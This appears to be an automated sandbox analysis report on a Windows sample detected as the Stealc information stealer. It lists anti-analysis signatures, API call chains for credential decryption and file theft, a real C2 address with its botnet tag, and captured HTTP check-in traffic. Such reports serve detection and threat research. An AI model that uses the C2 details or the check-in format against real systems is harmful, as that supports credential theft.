
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1572084
MD5: e814098146a7d5bb6910f684d24ddda7
SHA1: 3ac620ff3ae684e4d614ffb27821d8301f973a84
SHA256: 8bd7b0662ecb72eb60b3ae68a0534acb4a787263a37a619a48bc7a2186c4415d
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E814098146A7D5BB6910F684D24DDDA7)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}
Yara matches (Source | Rule | Description | Author):
  • dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
  • 00000000.00000003.1696046982.0000000004A00000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  • 00000000.00000002.1747032810.0000000000536000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  • 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  • Process Memory Space: file.exe PID: 7324 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
  • Process Memory Space: file.exe PID: 7324 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
No Sigma rule has matched
Suricata IDS alert:
  • Timestamp: 2024-12-10T04:31:05.531407+0100 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source: 192.168.2.4:49730 | Destination: 185.215.113.206:80 | Protocol: TCP

              AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.php/y | Avira URL Cloud: Label: malware
Source: file.exe.7324.0.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}
Source: http://185.215.113.206/c4becf79229cb002.php/y | Virustotal: Detection: 18%
Source: file.exe | Virustotal: Detection: 52%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C4B80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E4090 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C6000 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C9B80 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C9BE0 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008CED90 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008D6DE0 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C7690 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008D6FF9 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008DE330 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008D3CC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008DCCE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008D1C40 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C15A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C15B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008D15C0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008CDD70 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008D4EC0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008DD640 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008DDE50 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008D2730 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008D2749 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA

              Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: 185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GIJJKFCGDGHDHIECGCBK
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 31 43 38 32 32 45 36 43 41 39 32 31 32 37 33 37 30 37 38 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 2d 2d 0d 0a
    Data Ascii:
    ------GIJJKFCGDGHDHIECGCBK
    Content-Disposition: form-data; name="hwid"

    8A1C822E6CA92127370785
    ------GIJJKFCGDGHDHIECGCBK
    Content-Disposition: form-data; name="build"

    stok
    ------GIJJKFCGDGHDHIECGCBK--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (7 occurrences)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C4B80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GIJJKFCGDGHDHIECGCBK
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 31 43 38 32 32 45 36 43 41 39 32 31 32 37 33 37 30 37 38 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 2d 2d 0d 0a
    Data Ascii:
    ------GIJJKFCGDGHDHIECGCBK
    Content-Disposition: form-data; name="hwid"

    8A1C822E6CA92127370785
    ------GIJJKFCGDGHDHIECGCBK
    Content-Disposition: form-data; name="build"

    stok
    ------GIJJKFCGDGHDHIECGCBK--
Source: file.exe, 00000000.00000002.1747032810.000000000051E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/1
Source: file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/L
Source: file.exe, 00000000.00000002.1747032810.0000000000561000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/y
Source: file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php_
Source: file.exe, 00000000.00000002.1747032810.0000000000561000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpt
Source: file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/k
Source: file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/w
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C9876 CreateDesktopA,lstrcat,lstrcat,lstrcat,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop

              System Summary

Source: file.exe | Static PE information: section name: (empty or non-printable)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty or non-printable)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3F0EA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C778F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7508D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E48D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7D846
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B4D075
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D499D7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C829FA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B87295
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C71A83
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C1EA97
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7A256
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7BCAF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C05DC8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C735F9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C845B5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C4C557
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B6C525
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D05539
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C6069F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C8160B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7F77E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7877A
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 008C4980 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: dnuvwdxn ZLIB complexity 0.9948512815427621
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E39F0 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008DCBE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\M0F35AO3.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | Virustotal: Detection: 52%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
